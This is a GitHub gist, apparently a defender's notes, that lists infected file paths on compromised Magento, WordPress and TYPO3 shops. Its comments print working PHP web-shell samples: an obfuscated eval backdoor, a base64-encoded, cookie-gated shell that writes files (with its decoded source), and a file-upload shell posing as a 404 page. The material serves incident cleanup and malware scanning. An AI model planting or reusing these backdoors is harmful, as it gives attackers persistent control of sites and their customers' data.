Skip to content

Instantly share code, notes, and snippets.

@ins0

ins0/Infected files from shops on the gwillem list

Last active March 23, 2021 07:21
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save ins0/13a8fbbe84166377f3f3807b6efeae20 to your computer and use it in GitHub Desktop.
Save ins0/13a8fbbe84166377f3f3807b6efeae20 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Infected files from shops on the gwillem list
This is a short list with infected files from domains on the list of compromised online-shop of @gwillem.
**hacked-stores-in-last-48hrs.txt***
https://gist.github.com/gwillem/e7c77b77d508928ad67860970c366cae
If you have to deal with this it maybe helps you to find infected files.
./html/devsys/adminerc2q.php
./html/devsys/media/dhl/info.php
./html/livesys/media/dhl/info.php
./html/livesys/skin/skin.php
./html/magento/media/dhl/info.php
./html/wp-includes/shortcodes.php
/html/wp-includes/locale.php
./html/wp-includes/SimplePie/Cache/Base.php
./html/wp-content/themes/customizr/comments.php
./html/wp-content/themes/virtue/woocommerce/single-product/price.php
./html/wp-content/themes/virtue/7567567567.php
./html/wp-content/themes/virtue/page-blog.php
./html/wp-content/themes/virtue/404.php
./html/wp-content/themes/catch-kathmandu/sidebar-header-top.php
./html/includes/.src/Mage/Archive/css.php
./html/includes/.src/Mage/Centinel/dump.php
./html/includes/.src/Mage/PaypalUk/defines.php
./html/includes/.src/Magpleasure/Filesystem/db.php
./html/includes/.src/Varien/Pear/info.php
./html/includes/.src/Zend/Gdata/diff.php
./html/includes/.src/Zend/Http/sql.php
./html/includes/.src/Zend/Measure/db.php
./html/includes/.src/Zend/Paginator/sql.php
./html/lib/Zend/Controller/include.php
./html/lib/Zend/Currency/css.php
./html/lib/Zend/OpenId/Extension/template.php
./html/skin/frontend/{customfolder}/header.php
./html/var/package/tmp/article.php
./html/{customfolder}/media/dhl/info.php
./html/{customfolder}/skin/omo.php
./html/{customfolder}/skin/skins2.php
./html/magento/skin/Signedint.php
./html/magento/skin/install/default/install.php
./html/magento/skin/test.php
./html/magento/var/package/pack.php
./html/piwik/tmp/cache/tracker/PluginTranslations-de-4c5c90167f7f8091f2885497b017f3d6.php
./html/app/code/community/VladimirPopov/WebForms/Block/Adminhtml/Webforms.php
./html/app/code/community/VladimirPopov/WebForms/Block/Adminhtml/Webforms/Edit.php
./html/app/code/community/VladimirPopov/WebForms/Block/Webforms.php
./html/app/code/community/VladimirPopov/WebForms/controllers/Adminhtml/FieldsController.php
./html/app/code/community/VladimirPopov/WebForms/controllers/Adminhtml/WebformsController.php
./html/includes/src/VladimirPopov/WebForms/controllers/Adminhtml/FieldsController.php
./html/includes/src/VladimirPopov/WebForms/controllers/Adminhtml/WebformsController.php
./html/includes/src/VladimirPopov_WebForms_Block_Adminhtml_Webforms.php
./html/includes/src/VladimirPopov_WebForms_Block_Adminhtml_Webforms_Edit.php
./html/includes/src/VladimirPopov_WebForms_Block_Webforms.php
./html/media/dhl/info.php
./html/skin/error.php
./html/skin/ren1.php
./html/typo3/db2.php
./html/typo3/index.php
./html/typo3/sitemap.php
./html/typo3/skin/frontend/enterprise/default/cmspro/css/syntaxhighlighter/old_LibBackend.phpx
@gwillem
Copy link

gwillem commented Oct 18, 2016

Great! Would you mind to share some content, such as ./html/wp-includes/SimplePie/Cache/Base.php or ./html/typo3/skin/frontend/enterprise/default/cmspro/css/syntaxhighlighter/old_LibBackend.phpx ?

@ins0
Copy link
Author

ins0 commented Oct 18, 2016

I will try to get the contents of these files

@ins0
Copy link
Author

ins0 commented Oct 18, 2016
edited

@gwillem

./html/wp-includes/SimplePie/Cache/Base.php

$qV="stop_";$s20 = strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q170405'])){eval(${$s20}['q170405']);}?><?php

// if (isset($_POST['q170405'])) {
//    eval($_POST['q170405']);
// }

./html/typo3/skin/frontend/enterprise/default/cmspro/css/syntaxhighlighter/old_LibBackend.phpx

$b='ba'.'se'.(32*2).'_d'.'eco'.'de'; // base64_decode
$f='cr'.'ea'.'te_fu'.'nc'.'ti'.'on'; // create_function

$c=$b("JHBhc3MgPSAnYTYxYWZhMDdjMDMzMDBlMjAwNDhkNjQ0MTkyNWZkYjUnOw0KJGIgPSAnYicuJ2FzJy4nZTYnLic0X2QnLidlYycuJ29kZSc7DQokZnAgPSAnZmlsJy4nZV9wJy4ndXRfYycuJ29udCcuJ2VudCcuJ3MnOw0KJHNkID0gJ3NjJy4nYW5kJy4naXInOw0KJGN3ZCA9ICdnZScuJ3RjJy4nd2QnOw0KJG0gPSAnbScuJ2QnLigyKzMpOw0KDQppZiAoIWlzc2V0KCRfQ09PS0lFWydzdG9yYWdlX2xvY2FsX3ByYWdtYSddKSkgew0KICAgIG5vdF9mb3VuZCgpOw0KfSBlbHNlaWYgKGlzc2V0KCRfQ09PS0lFWydzdG9yYWdlX2xvY2FsX3ByYWdtYSddKSAmJiAkbSgkX0NPT0tJRVsnc3RvcmFnZV9sb2NhbF9wcmFnbWEnXSkgPT0gJHBhc3MpIHsNCiAgICBlY2hvICRjd2QoKTsNCiAgICBpZiAoaXNzZXQoJF9SRVFVRVNUWydkaXInXSkpIHsNCiAgICAgICAgcHJpbnRfcigkc2QoJF9SRVFVRVNUWydkaXInXSkpOw0KICAgIH0NCiAgICBpZiAoaXNzZXQoJF9SRVFVRVNUWydhbGFza2EnXSkpIHsNCiAgICAgICAgQCRmcCgkX1JFUVVFU1RbJ2FsYXNrYSddLCAkYigkX1JFUVVFU1RbJ2NvZGUnXSkpOw0KICAgIH0gICAgDQp9DQoNCmZ1bmN0aW9uIG5vdF9mb3VuZCgpDQp7DQogICAgaGVhZGVyKCdIVFRQLzEuMCA0MDQgTm90IEZvdW5kJyk7DQogICAgZGllKHByaW50KCdOb3QgRm91bmQnKSk7DQp9");

/**
    $pass = 'a61afa07c03300e20048d6441925fdb5';
    $b = 'b'.'as'.'e6'.'4_d'.'ec'.'ode';
    $fp = 'fil'.'e_p'.'ut_c'.'ont'.'ent'.'s';
    $sd = 'sc'.'and'.'ir';
    $cwd = 'ge'.'tc'.'wd';
    $m = 'm'.'d'.(2+3);

    if (!isset($_COOKIE['storage_local_pragma'])) {
        not_found();
    } elseif (isset($_COOKIE['storage_local_pragma']) && $m($_COOKIE['storage_local_pragma']) == $pass) {
        echo $cwd();
        if (isset($_REQUEST['dir'])) {
            print_r($sd($_REQUEST['dir']));
        }
        if (isset($_REQUEST['alaska'])) {
            @$fp($_REQUEST['alaska'], $b($_REQUEST['code']));
        }
    }

    function not_found()
    {
        header('HTTP/1.0 404 Not Found');
        die(print('Not Found'));
    }
**/


$f('', '};'.$c.'{'); // create_function('', };'.###CODE_ABOVE###.'{')

I found also a 404.php which is basically a simple file upload (like the script above) script - maybe these files where uploaded with these scripts.

/html/wp-content/themes/virtue/404.php

<?php
if(isset($_POST['Submit'])){
    $filedir = ""; 
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);

echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
}
?>

@gwillem
Copy link

gwillem commented Mar 13, 2018

For future reference, I have included these and many other malware samples in the Magento Malware Scanner

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment